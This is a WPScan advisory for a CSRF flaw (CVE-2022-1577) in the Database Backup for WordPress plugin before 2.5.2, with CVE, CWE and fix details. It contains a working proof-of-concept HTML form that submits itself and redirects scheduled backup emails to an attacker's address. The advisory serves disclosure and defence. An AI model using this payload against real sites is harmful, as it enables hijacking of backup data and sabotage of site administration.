WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Database Backup for WordPress < 2.5.2 - Arbitrary Schedule Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating the schedule backup settings, which could allow an attacker to make a logged in admin change them via a CSRF attack. This could lead to cases where attackers can send backup notification emails to themselves, which contain more details. Or disable the automatic backup schedule

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=wp-db-backup#schedule" method="POST">
    <input type="text" name="wp_cron_schedule" value="daily">
    <input type="text" name="cron_backup_recipient" value="[email protected]">
    <input type="text" name="wp_cron_backup_options" value="SET">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

wp-db-backup
Fixed in version 2.5.2

References

CVE
CVE-2022-1577

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website
https://daniel-ruf.de
Verified

Yes

WPVDB ID
39388900-266d-4308-88e7-d40ca6bbe346

Timeline

Publicly Published

2022-05-11 (about 1 years ago)

Added

2022-05-11 (about 1 years ago)

Last Updated

2022-05-11 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin